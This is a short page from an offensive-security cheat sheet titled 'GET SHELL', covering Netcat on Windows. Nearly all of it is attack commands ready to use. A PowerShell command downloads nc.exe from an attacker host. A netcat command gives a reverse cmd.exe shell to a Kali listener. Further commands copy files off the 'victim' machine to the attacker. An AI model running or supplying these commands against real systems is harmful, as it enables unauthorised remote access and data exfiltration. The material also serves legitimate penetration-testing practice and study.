GET SHELL

Netcat Windows

powershell wget "http://10.0.2.6/windows-resources/binaries/nc.exe" -outfile nc.exe
nc.exe -e cmd.exe [KALI-IP] 1234

#on Kali listen with
nc -nvlp 1234

Transfer Files

# listen on kali with
nc -lp 1235 > [FILENAME]

# transfer file on victim
nc.exe -w 3 [KALI-IP] 1235 <[FILENAME]

Last updated

Was this helpful?